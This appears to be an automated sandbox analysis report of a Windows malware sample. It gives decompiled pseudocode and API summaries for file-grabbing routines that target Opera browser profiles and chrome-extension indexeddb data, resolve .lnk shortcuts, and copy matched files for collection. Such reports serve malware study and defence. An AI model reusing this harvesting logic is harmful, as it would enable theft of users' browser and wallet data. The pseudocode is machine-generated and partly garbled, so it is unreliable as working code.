                                                                    									E00411DA6(_v2448, _v2456, _t240,  &_v1596, _v2452,  &_v276, _a16, 3);
                                                                    									_t227 = 0x104;
                                                                    								}
                                                                    							}
                                                                    							E00426300( &_v540, 0, _t227);
                                                                    							E00426300( &_v1068, 0, _t227);
                                                                    							E00426300( &_v804, 0, _t227);
                                                                    							E00426300( &_v1332, 0, _t227);
                                                                    							E00426300( &_v1596, 0, _t227);
                                                                    							E00426300( &_v1860, 0, _t227);
                                                                    							_t245 = _t251 + 0x48;
                                                                    						}
                                                                    						L18:
                                                                    					} while (FindNextFileA(_v2468,  &_v2444) != 0);
                                                                    					_t158 = FindClose(_v2468);
                                                                    				}
                                                                    			}





































                                                                    APIs
                                                                    • wsprintfA.USER32 ref: 004120DB
                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 004120FC
                                                                    • StrCmpCA.SHLWAPI(?,0043EAC4), ref: 00412127
                                                                    • StrCmpCA.SHLWAPI(?,0043EAC8), ref: 00412141
                                                                    • _memset.LIBCMT ref: 0041215E
                                                                    • lstrcatA.KERNEL32(?,?), ref: 00412174
                                                                    • wsprintfA.USER32 ref: 0041219B
                                                                    • wsprintfA.USER32 ref: 004121B6
                                                                    • wsprintfA.USER32 ref: 004121DD
                                                                    • wsprintfA.USER32 ref: 004121FB
                                                                    • wsprintfA.USER32 ref: 00412226
                                                                    • wsprintfA.USER32 ref: 00412241
                                                                    • GetFileAttributesA.KERNEL32(?), ref: 00412257
                                                                      • Part of subcall function 00411DA6: wsprintfA.USER32 ref: 00411DE9
                                                                      • Part of subcall function 00411DA6: FindFirstFileA.KERNEL32(?,?), ref: 00411E00
                                                                      • Part of subcall function 00411DA6: StrCmpCA.SHLWAPI(?,0043EAC4), ref: 00411E2E
                                                                      • Part of subcall function 00411DA6: StrCmpCA.SHLWAPI(?,0043EAC8), ref: 00411E48
                                                                      • Part of subcall function 00411DA6: _memset.LIBCMT ref: 00411E60
                                                                      • Part of subcall function 00411DA6: _memset.LIBCMT ref: 00411E72
                                                                      • Part of subcall function 00411DA6: lstrcatA.KERNEL32(?,?), ref: 00411E87
                                                                      • Part of subcall function 00411DA6: lstrcatA.KERNEL32(?,0043C8E0), ref: 00411E95
                                                                      • Part of subcall function 00411DA6: lstrcatA.KERNEL32(?,?), ref: 00411EA9
                                                                      • Part of subcall function 00411DA6: lstrcatA.KERNEL32(?,0043C8E0), ref: 00411EB7
                                                                      • Part of subcall function 00411DA6: lstrcatA.KERNEL32(?), ref: 00411ED8
                                                                      • Part of subcall function 00411DA6: lstrcatA.KERNEL32(?,0043C8E0), ref: 00411EE6
                                                                      • Part of subcall function 00411DA6: lstrcatA.KERNEL32(?,?), ref: 00411EF9
                                                                      • Part of subcall function 00411DA6: lstrcatA.KERNEL32(?,0043C8E0), ref: 00411F07
                                                                      • Part of subcall function 00411DA6: lstrcatA.KERNEL32(?,?), ref: 00411F1A
                                                                      • Part of subcall function 00411DA6: lstrcatA.KERNEL32(?,0043C8E0), ref: 00411F28
                                                                    • GetFileAttributesA.KERNEL32(?), ref: 004122A2
                                                                    • GetFileAttributesA.KERNEL32(?), ref: 004122ED
                                                                    • _memset.LIBCMT ref: 00412335
                                                                    • _memset.LIBCMT ref: 00412347
                                                                    • _memset.LIBCMT ref: 00412359
                                                                    • _memset.LIBCMT ref: 0041236B
                                                                    • _memset.LIBCMT ref: 0041237D
                                                                    • _memset.LIBCMT ref: 0041238F
                                                                    • FindNextFileA.KERNEL32(?,?), ref: 004123A4
                                                                    • FindClose.KERNEL32(?), ref: 004123B8
                                                                    • _memset.LIBCMT ref: 004123D1
                                                                    • lstrcatA.KERNEL32(?,Opera Stable), ref: 004123F5
                                                                    • wsprintfA.USER32 ref: 00412417
                                                                    • wsprintfA.USER32 ref: 00412437
                                                                    • wsprintfA.USER32 ref: 00412459
                                                                    • wsprintfA.USER32 ref: 00412477
                                                                    • wsprintfA.USER32 ref: 0041249D
                                                                    • wsprintfA.USER32 ref: 004124B8
                                                                    • GetFileAttributesA.KERNEL32(?), ref: 004124C8
                                                                    • GetFileAttributesA.KERNEL32(?), ref: 00412508
                                                                    • GetFileAttributesA.KERNEL32(?), ref: 00412548
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: wsprintf$lstrcat$_memset$File$Attributes$Find$First$CloseNext
                                                                    • String ID: %s\%s$%s\%s\%s\%s$%s\%s\%s\chrome-extension_%s_0.indexeddb.leveldb$%s\*.*$Opera GX Stable$Opera Stable
                                                                    • API String ID: 2553220182-549290927
                                                                    • Opcode ID: f872b001391677ae39d342b492b5de03784d0af02598ae72d7d4cd58697e88e0
                                                                    • Instruction ID: d78126b9ff59cf83e8bdb547cd37f9e283cf866233b4c538abf8663ebc827e85
                                                                    • Opcode Fuzzy Hash: f872b001391677ae39d342b492b5de03784d0af02598ae72d7d4cd58697e88e0
                                                                    • Instruction Fuzzy Hash: 45D13AB190122DAFDF21DBA4DC89FDA777CBB09304F0004E6F618E2151E7759A998F68
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 41%
                                                                    			E0040954D(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, char* _a16, intOrPtr _a20, intOrPtr _a24, CHAR* _a28, int _a32, int _a36, intOrPtr _a40) {
                                                                    				signed int _v8;
                                                                    				char _v276;
                                                                    				char _v540;
                                                                    				char _v1540;
                                                                    				char _v1804;
                                                                    				char _v2804;
                                                                    				char _v7804;
                                                                    				struct _WIN32_FIND_DATAA _v8124;
                                                                    				intOrPtr _v8128;
                                                                    				intOrPtr _v8132;
                                                                    				intOrPtr _v8136;
                                                                    				char* _v8140;
                                                                    				char _v8144;
                                                                    				void* _v8148;
                                                                    				char _v8152;
                                                                    				char _v8156;
                                                                    				CHAR* _v8160;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				void* __ebp;
                                                                    				signed int _t107;
                                                                    				intOrPtr _t111;
                                                                    				char* _t117;
                                                                    				int _t119;
                                                                    				char* _t135;
                                                                    				char* _t136;
                                                                    				void* _t137;
                                                                    				int _t144;
                                                                    				int _t158;
                                                                    				char* _t159;
                                                                    				int _t163;
                                                                    				int _t170;
                                                                    				CHAR* _t185;
                                                                    				int _t187;
                                                                    				CHAR* _t194;
                                                                    				void* _t208;
                                                                    				void* _t211;
                                                                    				void* _t216;
                                                                    				void* _t217;
                                                                    				char* _t226;
                                                                    				void* _t227;
                                                                    				CHAR* _t229;
                                                                    				signed int _t230;
                                                                    				void* _t231;
                                                                    				void* _t232;
                                                                    				char* _t233;
                                                                    				void* _t255;
                                                                    
                                                                    				_t227 = __edx;
                                                                    				E0042E300(0x1fdc);
                                                                    				_t107 =  *0x443674; // 0x393162b1
                                                                    				_v8 = _t107 ^ _t230;
                                                                    				_v8128 = _a4;
                                                                    				_t229 = _a28;
                                                                    				_v8136 = _a8;
                                                                    				_t111 = _a12;
                                                                    				_v8132 = _t111;
                                                                    				_v8140 = _a16;
                                                                    				_v8160 = _t229;
                                                                    				wsprintfA( &_v1804, "%s\\*", _t111);
                                                                    				_t232 = _t231 + 0xc;
                                                                    				_v8148 = FindFirstFileA( &_v1804,  &_v8124);
                                                                    				_t211 = 0x1388;
                                                                    				_t117 =  &_v7804;
                                                                    				do {
                                                                    					 *_t117 = 0;
                                                                    					_t117 = _t117 + 1;
                                                                    					_t211 = _t211 - 1;
                                                                    				} while (_t211 != 0);
                                                                    				_t119 = lstrcatA( &_v7804, _t229);
                                                                    				if(_v8148 == 0xffffffff) {
                                                                    					L52:
                                                                    					return E0041DA9B(_t119, 0, _v8 ^ _t230, _t227, 0x3e8, _t229);
                                                                    				}
                                                                    				do {
                                                                    					_push(".");
                                                                    					_push( &(_v8124.cFileName));
                                                                    					if( *0x446458() == 0) {
                                                                    						goto L50;
                                                                    					}
                                                                    					_push("..");
                                                                    					_push( &(_v8124.cFileName));
                                                                    					if( *0x446458() != 0 && E00409404(_v8132, _t227, 0x80000000) != 0) {
                                                                    						 *0x4464d4( &_v276, _v8132);
                                                                    						_t229 = 0x43c8e0;
                                                                    						lstrcatA( &_v276, 0x43c8e0);
                                                                    						lstrcatA( &_v276,  &(_v8124.cFileName));
                                                                    						_t240 = _a36;
                                                                    						if(_a36 != 0) {
                                                                    							L9:
                                                                    							_t216 = 0x3e8;
                                                                    							_t135 =  &_v1540;
                                                                    							do {
                                                                    								 *_t135 = 0;
                                                                    								_t135 = _t135 + 1;
                                                                    								_t216 = _t216 - 1;
                                                                    							} while (_t216 != 0);
                                                                    							_t217 = 0x3e8;
                                                                    							_t136 =  &_v2804;
                                                                    							do {
                                                                    								 *_t136 = 0;
                                                                    								_t136 = _t136 + 1;
                                                                    								_t217 = _t217 - 1;
                                                                    							} while (_t217 != 0);
                                                                    							_t137 =  *0x446458(_v8136, 0x43c8d8);
                                                                    							_push( &(_v8124.cFileName));
                                                                    							if(_t137 != 0) {
                                                                    								_push(_v8136);
                                                                    								wsprintfA( &_v2804, "%s\\%s");
                                                                    								_t232 = _t232 + 0x10;
                                                                    							} else {
                                                                    								wsprintfA( &_v2804, "%s");
                                                                    								_t232 = _t232 + 0xc;
                                                                    							}
                                                                    							_push( &_v7804);
                                                                    							if( *0x446320() <= 3) {
                                                                    								__eflags = _a36;
                                                                    								if(_a36 == 0) {
                                                                    									L44:
                                                                    									_t144 = PathMatchSpecA( &(_v8124.cFileName), _v8140);
                                                                    									__eflags = _t144;
                                                                    									if(_t144 == 0) {
                                                                    										goto L48;
                                                                    									}
                                                                    									 *0x4464d4( &_v540, _v8136);
                                                                    									_push(_t229);
                                                                    									goto L36;
                                                                    								}
                                                                    								_t163 = PathMatchSpecA( &(_v8124.cFileName), "*.lnk");
                                                                    								__eflags = _t163;
                                                                    								if(_t163 == 0) {
                                                                    									goto L44;
                                                                    								}
                                                                    								 *0x44644c(0);
                                                                    								E004090C6( &_v276,  &_v1540);
                                                                    								_pop(_t217);
                                                                    								 *0x446430();
                                                                    								_t170 = PathMatchSpecA( &_v1540, _v8140);
                                                                    								__eflags = _t170;
                                                                    								if(_t170 == 0) {
                                                                    									goto L48;
                                                                    								}
                                                                    								 *0x4464d4( &_v540, _v8136);
                                                                    								_push(_t229);
                                                                    								goto L30;
                                                                    							} else {
                                                                    								_t185 = E0041E87C(0, _t227, 0x3e8,  &_v7804, ":",  &_v8156);
                                                                    								_t232 = _t232 + 0xc;
                                                                    								_t229 = _t185;
                                                                    								_v8152 = 0;
                                                                    								_v8144 = 0;
                                                                    								if(_a36 != 0 && PathMatchSpecA( &(_v8124.cFileName), "*.lnk") != 0) {
                                                                    									_v8144 = 1;
                                                                    									 *0x44644c(0);
                                                                    									E004090C6( &_v276,  &_v1540);
                                                                    									_pop(_t217);
                                                                    									 *0x446430();
                                                                    								}
                                                                    								if(_t229 == 0) {
                                                                    									L27:
                                                                    									_push(_v8140);
                                                                    									if(_v8144 == 0) {
                                                                    										_t187 = PathMatchSpecA( &(_v8124.cFileName));
                                                                    										__eflags = _t187;
                                                                    										if(_t187 == 0) {
                                                                    											goto L48;
                                                                    										}
                                                                    										 *0x4464d4( &_v540, _v8136);
                                                                    										_push(0x43c8e0);
                                                                    										L36:
                                                                    										lstrcatA( &_v540, ??);
                                                                    										lstrcatA( &_v540,  &(_v8124.cFileName));
                                                                    										 *0x4461f8 =  *0x4461f8 + E00426ED0(E00416388(_t217,  &_v276), _t227, 0x3e8, 0);
                                                                    										_t119 =  *0x4461ec; // 0x9c40
                                                                    										__eflags = _t119 -  *0x4461f8; // 0x0
                                                                    										if(__eflags <= 0) {
                                                                    											goto L52;
                                                                    										}
                                                                    										_t158 = E00409404(_v8132, _t227, 0xc0000000);
                                                                    										__eflags = _t158;
                                                                    										if(_t158 == 0) {
                                                                    											goto L48;
                                                                    										}
                                                                    										_push(2);
                                                                    										_push(0);
                                                                    										__eflags = _a32;
                                                                    										if(_a32 == 0) {
                                                                    											L46:
                                                                    											_t159 =  &_v540;
                                                                    											L47:
                                                                    											_push(_t159);
                                                                    											E0041CE7C(_v8128);
                                                                    											_t232 = _t232 + 0xc;
                                                                    											goto L48;
                                                                    										}
                                                                    										_t159 =  &_v276;
                                                                    										goto L47;
                                                                    									}
                                                                    									if(PathMatchSpecA( &_v1540) == 0) {
                                                                    										goto L48;
                                                                    									}
                                                                    									 *0x4464d4( &_v540, _v8136);
                                                                    									_push(0x43c8e0);
                                                                    									L30:
                                                                    									lstrcatA( &_v540, ??);
                                                                    									lstrcatA( &_v540, PathFindFileNameA( &_v1540));
                                                                    									 *0x4461f8 =  *0x4461f8 + E00426ED0(E00416388(_t217,  &_v276), _t227, 0x3e8, 0);
                                                                    									_t119 =  *0x4461ec; // 0x9c40
                                                                    									_t255 = _t119 -  *0x4461f8; // 0x0
                                                                    									if(_t255 <= 0) {
                                                                    										goto L52;
                                                                    									}
                                                                    									if(E00409404(_v8132, _t227, 0xc0000000) == 0) {
                                                                    										goto L48;
                                                                    									}
                                                                    									_push(2);
                                                                    									_push(0);
                                                                    									if(_a32 == 0) {
                                                                    										goto L46;
                                                                    									}
                                                                    									_t159 =  &_v1540;
                                                                    									goto L47;
                                                                    								} else {
                                                                    									do {
                                                                    										_push(0);
                                                                    										_push(_t229);
                                                                    										_t194 =  &_v1540;
                                                                    										if(_v8144 == 0) {
                                                                    											_t194 =  &(_v8124.cFileName);
                                                                    										}
                                                                    										_push(_t194);
                                                                    										if( *0x446398() != 0) {
                                                                    											_v8152 = 1;
                                                                    										}
                                                                    										_t229 = E0041E87C(0, _t227, 0x3e8, 0, ":",  &_v8156);
                                                                    										_t232 = _t232 + 0xc;
                                                                    									} while (_t229 != 0);
                                                                    									if(_v8152 != 0) {
                                                                    										L48:
                                                                    										if(_a20 != 0) {
                                                                    											E0040954D(_t227, _v8128,  &_v2804,  &_v276, _v8140, _a20, _a24, _v8160, _a32, _a36, _a40);
                                                                    											_t232 = _t232 + 0x28;
                                                                    										}
                                                                    										goto L50;
                                                                    									}
                                                                    									goto L27;
                                                                    								}
                                                                    							}
                                                                    						}
                                                                    						_t233 = _t232 - 0x1c;
                                                                    						_t226 = _t233;
                                                                    						_v8144 = _t233;
                                                                    						 *((intOrPtr*)(_t226 + 0x14)) = 0xf;
                                                                    						 *((intOrPtr*)(_t226 + 0x10)) = 0;
                                                                    						 *_t226 = 0;
                                                                    						E00404331(_t226,  &_v276);
                                                                    						_t208 = E004091E5(0, _t226, 0x3e8, 0x43c8e0, _t240);
                                                                    						_t232 = _t233 + 0x1c;
                                                                    						if(_t208 != 0) {
                                                                    							goto L50;
                                                                    						}
                                                                    						goto L9;
                                                                    					}
                                                                    					L50:
                                                                    				} while (FindNextFileA(_v8148,  &_v8124) != 0);
                                                                    				_t119 = FindClose(_v8148);
                                                                    				goto L52;
                                                                    			}
                                                                    0x0040961c
                                                                    0x00409625
                                                                    0x00409651
                                                                    0x00409657
                                                                    0x00409664
                                                                    0x00409678
                                                                    0x0040967e
                                                                    0x00409681
                                                                    0x004096b6
                                                                    0x004096b6
                                                                    0x004096b8
                                                                    0x004096be
                                                                    0x004096be
                                                                    0x004096c0
                                                                    0x004096c1
                                                                    0x004096c1
                                                                    0x004096c4
                                                                    0x004096c6
                                                                    0x004096cc
                                                                    0x004096cc
                                                                    0x004096ce
                                                                    0x004096cf
                                                                    0x004096cf
                                                                    0x004096dd
                                                                    0x004096eb
                                                                    0x004096f2
                                                                    0x00409705
                                                                    0x00409711
                                                                    0x00409717
                                                                    0x004096f4
                                                                    0x004096fa
                                                                    0x00409700
                                                                    0x00409700
                                                                    0x00409720
                                                                    0x0040972a
                                                                    0x00409967
                                                                    0x0040996a
                                                                    0x004099d4
                                                                    0x004099e1
                                                                    0x004099e7
                                                                    0x004099e9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004099f8
                                                                    0x004099fe
                                                                    0x00000000
                                                                    0x004099fe
                                                                    0x00409978
                                                                    0x0040997e
                                                                    0x00409980
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00409983
                                                                    0x00409997
                                                                    0x0040999d
                                                                    0x0040999e
                                                                    0x004099b1
                                                                    0x004099b7
                                                                    0x004099b9
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004099c8
                                                                    0x004099ce
                                                                    0x00000000
                                                                    0x00409730
                                                                    0x00409743
                                                                    0x00409748
                                                                    0x0040974b
                                                                    0x0040974d
                                                                    0x00409753
                                                                    0x0040975c
                                                                    0x00409775
                                                                    0x0040977f
                                                                    0x00409793
                                                                    0x00409799
                                                                    0x0040979a
                                                                    0x0040979a
                                                                    0x004097a2
                                                                    0x004097f6
                                                                    0x004097f6
                                                                    0x00409802
                                                                    0x004098c2
                                                                    0x004098c8
                                                                    0x004098ca
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004098dd
                                                                    0x004098e3
                                                                    0x004098e8
                                                                    0x004098ef
                                                                    0x00409903
                                                                    0x0040991e
                                                                    0x00409924
                                                                    0x00409929
                                                                    0x0040992f
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00409940
                                                                    0x00409946
                                                                    0x00409948
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040994e
                                                                    0x00409956
                                                                    0x00409957
                                                                    0x0040995a
                                                                    0x00409a04
                                                                    0x00409a04
                                                                    0x00409a0a
                                                                    0x00409a0a
                                                                    0x00409a11
                                                                    0x00409a16
                                                                    0x00000000
                                                                    0x00409a16
                                                                    0x00409960
                                                                    0x00000000
                                                                    0x00409960
                                                                    0x00409817
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040982a
                                                                    0x00409830
                                                                    0x00409835
                                                                    0x0040983c
                                                                    0x00409857
                                                                    0x00409872
                                                                    0x00409878
                                                                    0x0040987d
                                                                    0x00409883
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x0040989c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004098a2
                                                                    0x004098aa
                                                                    0x004098ae
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004098b4
                                                                    0x00000000
                                                                    0x004097a4
                                                                    0x004097a4
                                                                    0x004097a4
                                                                    0x004097a5
                                                                    0x004097a6
                                                                    0x004097b2
                                                                    0x004097b4
                                                                    0x004097b4
                                                                    0x004097ba
                                                                    0x004097c3
                                                                    0x004097c5
                                                                    0x004097c5
                                                                    0x004097e1
                                                                    0x004097e3
                                                                    0x004097e6
                                                                    0x004097f0
                                                                    0x00409a19
                                                                    0x00409a1c
                                                                    0x00409a4d
                                                                    0x00409a52
                                                                    0x00409a52
                                                                    0x00000000
                                                                    0x00409a1c
                                                                    0x00000000
                                                                    0x004097f0
                                                                    0x004097a2
                                                                    0x0040972a
                                                                    0x00409683
                                                                    0x00409686
                                                                    0x0040968e
                                                                    0x00409694
                                                                    0x0040969b
                                                                    0x0040969f
                                                                    0x004096a1
                                                                    0x004096a6
                                                                    0x004096ab
                                                                    0x004096b0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x004096b0
                                                                    0x00409a55
                                                                    0x00409a68
                                                                    0x00409a76
                                                                    0x00000000

                                                                    APIs
                                                                    • wsprintfA.USER32 ref: 004095A1
                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 004095B8
                                                                    • lstrcatA.KERNEL32(?,?), ref: 004095DF
                                                                    • StrCmpCA.SHLWAPI(?,0043EAC4), ref: 00409603
                                                                    • StrCmpCA.SHLWAPI(?,0043EAC8), ref: 0040961D
                                                                    • lstrcpy.KERNEL32(?,?), ref: 00409651
                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 00409664
                                                                    • lstrcatA.KERNEL32(?,?), ref: 00409678
                                                                    • StrCmpCA.SHLWAPI(?,0043C8D8), ref: 004096DD
                                                                    • wsprintfA.USER32 ref: 004096FA
                                                                    • wsprintfA.USER32 ref: 00409711
                                                                    • lstrlen.KERNEL32(?), ref: 00409721
                                                                    • _strtok_s.LIBCMT ref: 00409743
                                                                    • PathMatchSpecA.SHLWAPI(?,*.lnk), ref: 0040976A
                                                                    • PathMatchSpecA.SHLWAPI(?,?), ref: 004098C2
                                                                    • lstrcpy.KERNEL32(?,?), ref: 004098DD
                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 004098EF
                                                                    • lstrcatA.KERNEL32(?,?), ref: 00409903
                                                                      • Part of subcall function 00416388: CreateFileA.KERNEL32(00409915,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,?,00409915,?), ref: 004163A3
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00409919
                                                                      • Part of subcall function 00409404: GetFileSecurityA.ADVAPI32(?,00000007,00000000,00000000,?), ref: 00409427
                                                                      • Part of subcall function 00409404: GetLastError.KERNEL32(?,00000007,00000000,00000000,?), ref: 00409435
                                                                      • Part of subcall function 00409404: _malloc.LIBCMT ref: 00409447
                                                                      • Part of subcall function 00409404: GetFileSecurityA.ADVAPI32(?,00000007,00000000,?,?), ref: 00409462
                                                                      • Part of subcall function 00409404: GetCurrentProcess.KERNEL32(0002000E,?,?,00000007,00000000,?,?,?,00000007,00000000,00000000,?), ref: 0040947C
                                                                      • Part of subcall function 00409404: OpenProcessToken.ADVAPI32(00000000,?,00000007,00000000,?,?,?,00000007,00000000,00000000,?), ref: 00409483
                                                                      • Part of subcall function 00409404: DuplicateToken.ADVAPI32(?,00000002,?,?,00000007,00000000,?,?,?,00000007,00000000,00000000,?), ref: 0040949D
                                                                      • Part of subcall function 00409404: MapGenericMask.ADVAPI32(?,?,?,00000007,00000000,?,?,?,00000007,00000000,00000000,?), ref: 004094F0
                                                                      • Part of subcall function 00409404: AccessCheck.ADVAPI32(00000000,?,?,00120089,?,00000014,?,?,?,00000007,00000000,?,?,?,00000007,00000000), ref: 00409511
                                                                      • Part of subcall function 00409404: CloseHandle.KERNEL32(?,?,00000007,00000000,?,?,?,00000007,00000000,00000000,?), ref: 00409525
                                                                    • CoInitialize.OLE32 ref: 0040977F
                                                                      • Part of subcall function 004090C6: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000104), ref: 00409150
                                                                      • Part of subcall function 004090C6: lstrcpyn.KERNEL32(?,?,00000104), ref: 004091CE
                                                                    • _strtok_s.LIBCMT ref: 004097DC
                                                                    • PathMatchSpecA.SHLWAPI(?,?), ref: 0040980F
                                                                    • lstrcpy.KERNEL32(?,?), ref: 0040982A
                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 0040983C
                                                                    • PathFindFileNameA.SHLWAPI(?), ref: 00409849
                                                                    • lstrcatA.KERNEL32(?,00000000), ref: 00409857
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0040986D
                                                                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00409A62
                                                                    • FindClose.KERNEL32(000000FF), ref: 00409A76
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcat$File$FindPath$MatchSpeclstrcpywsprintf$CloseProcessSecurityTokenUnothrow_t@std@@@__ehfuncinfo$??2@_strtok_s$AccessByteCharCheckCreateCurrentDuplicateErrorFirstGenericHandleInitializeLastMaskMultiNameNextOpenWide_malloclstrcpynlstrlen
                                                                    • String ID: %s\%s$%s\*$*.lnk
                                                                    • API String ID: 3386769076-1856930566
                                                                    • Opcode ID: f457b3f8171ba05844a7d5be14d052b518339aa32272a24b8ecf4cc3eb23f5e7
                                                                    • Instruction ID: 0b638757ecbccf9d3a8f24bd1ab2112c79f99c09bba3d38c3dea7a2e7699b54e
                                                                    • Opcode Fuzzy Hash: f457b3f8171ba05844a7d5be14d052b518339aa32272a24b8ecf4cc3eb23f5e7
                                                                    • Instruction Fuzzy Hash: 02D1207590025EABDF20DF61DC88AEA77BCBB09305F0504BAF509E2191DB349E84CF59
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 72%
                                                                    			E00411DA6(void* __ebx, CHAR* __ecx, void* __edx, CHAR* _a4, CHAR* _a8, CHAR* _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                    				signed int _v12;
                                                                    				char _v280;
                                                                    				char _v544;
                                                                    				char _v808;
                                                                    				char _v1072;
                                                                    				struct _WIN32_FIND_DATAA _v1392;
                                                                    				void* _v1396;
                                                                    				CHAR* _v1400;
                                                                    				CHAR* _v1404;
                                                                    				CHAR* _v1408;
                                                                    				CHAR* _v1412;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				signed int _t58;
                                                                    				CHAR* _t60;
                                                                    				int _t65;
                                                                    				CHAR* _t86;
                                                                    				void* _t101;
                                                                    				void* _t115;
                                                                    				void* _t130;
                                                                    				void* _t136;
                                                                    				void* _t142;
                                                                    				signed int _t145;
                                                                    				void* _t146;
                                                                    				void* _t147;
                                                                    				void* _t149;
                                                                    
                                                                    				_t142 = __edx;
                                                                    				_t136 = __ebx;
                                                                    				_t58 =  *0x443674; // 0x393162b1
                                                                    				_v12 = _t58 ^ _t145;
                                                                    				_t60 = _a4;
                                                                    				_v1404 = __ecx;
                                                                    				_v1408 = _t60;
                                                                    				_v1412 = _a8;
                                                                    				_t139 = _a12;
                                                                    				_v1400 = _a12;
                                                                    				wsprintfA( &_v1072, "%s\\*", _t60);
                                                                    				_t147 = _t146 + 0xc;
                                                                    				_t65 = FindFirstFileA( &_v1072,  &_v1392);
                                                                    				_v1396 = _t65;
                                                                    				if(_t65 != 0xffffffff) {
                                                                    					do {
                                                                    						 *((intOrPtr*)(_t136 + 0x1c)) =  *((intOrPtr*)(_t136 + 0x1c)) + 1;
                                                                    						_push(".");
                                                                    						_push( &(_v1392.cFileName));
                                                                    						if( *0x446458() != 0) {
                                                                    							_push("..");
                                                                    							_push( &(_v1392.cFileName));
                                                                    							if( *0x446458() != 0) {
                                                                    								E00426300( &_v808, 0, 0x104);
                                                                    								E00426300( &_v280, 0, 0x104);
                                                                    								_t149 = _t147 + 0x18;
                                                                    								lstrcatA( &_v808, _v1408);
                                                                    								lstrcatA( &_v808, 0x43c8e0);
                                                                    								lstrcatA( &_v808,  &(_v1392.cFileName));
                                                                    								lstrcatA( &_v280, 0x43c8e0);
                                                                    								_t86 =  &_v280;
                                                                    								if(_a16 == 0) {
                                                                    									_push( *0x446164);
                                                                    								} else {
                                                                    									_push( *0x445b2c);
                                                                    								}
                                                                    								lstrcatA(_t86, ??);
                                                                    								lstrcatA( &_v280, 0x43c8e0);
                                                                    								lstrcatA( &_v280, _v1404);
                                                                    								lstrcatA( &_v280, 0x43c8e0);
                                                                    								lstrcatA( &_v280, _v1412);
                                                                    								lstrcatA( &_v280, 0x43c8e0);
                                                                    								lstrcatA( &_v280, _v1400);
                                                                    								_t101 = _a20 - 1;
                                                                    								if(_t101 == 0) {
                                                                    									lstrcatA( &_v280, 0x43c8e0);
                                                                    									_push( *0x445fd4);
                                                                    									goto L13;
                                                                    								} else {
                                                                    									_t130 = _t101 - 1;
                                                                    									if(_t130 == 0) {
                                                                    										lstrcatA( &_v280, 0x43c8e0);
                                                                    										_push( *0x445e54);
                                                                    										goto L13;
                                                                    									} else {
                                                                    										_t157 = _t130 == 1;
                                                                    										if(_t130 == 1) {
                                                                    											lstrcatA( &_v280, 0x43c8e0);
                                                                    											_push( *0x445b64);
                                                                    											L13:
                                                                    											lstrcatA( &_v280, ??);
                                                                    										}
                                                                    									}
                                                                    								}
                                                                    								lstrcatA( &_v280, 0x43c8e0);
                                                                    								lstrcatA( &_v280,  &(_v1392.cFileName));
                                                                    								E00426300( &_v544, 0, 0x104);
                                                                    								lstrcatA( &_v544,  *0x445fe0);
                                                                    								_t115 = 0x1a;
                                                                    								lstrcatA( &_v544, E00415EF6(_t115, _t157));
                                                                    								CopyFileA( &_v808,  &_v544, 1);
                                                                    								 *0x4461f8 =  *0x4461f8 + E00426ED0(E00416388(_t139,  &_v544), _t142, 0x3e8, 0);
                                                                    								_t139 =  &_v544;
                                                                    								E0041CE7C( *((intOrPtr*)(_t136 + 0x20)),  &_v280, 0, 2);
                                                                    								_t147 = _t149 + 0x18;
                                                                    								DeleteFileA( &_v544);
                                                                    							}
                                                                    						}
                                                                    					} while (FindNextFileA(_v1396,  &_v1392) != 0);
                                                                    					_t65 = FindClose(_v1396);
                                                                    				}
                                                                    				return E0041DA9B(_t65, _t136, _v12 ^ _t145, _t142, 0x104, 0x43c8e0);
                                                                    			}

                                                                    APIs
                                                                    • wsprintfA.USER32 ref: 00411DE9
                                                                    • FindFirstFileA.KERNEL32(?,?), ref: 00411E00
                                                                    • StrCmpCA.SHLWAPI(?,0043EAC4), ref: 00411E2E
                                                                    • StrCmpCA.SHLWAPI(?,0043EAC8), ref: 00411E48
                                                                    • _memset.LIBCMT ref: 00411E60
                                                                    • _memset.LIBCMT ref: 00411E72
                                                                    • lstrcatA.KERNEL32(?,?), ref: 00411E87
                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 00411E95
                                                                    • lstrcatA.KERNEL32(?,?), ref: 00411EA9
                                                                    • lstrcatA.KERNEL32(?,0043C8E0), ref: 00411EB7
                                                                    • lstrcatA.KERNEL32(?), ref: 00411ED8
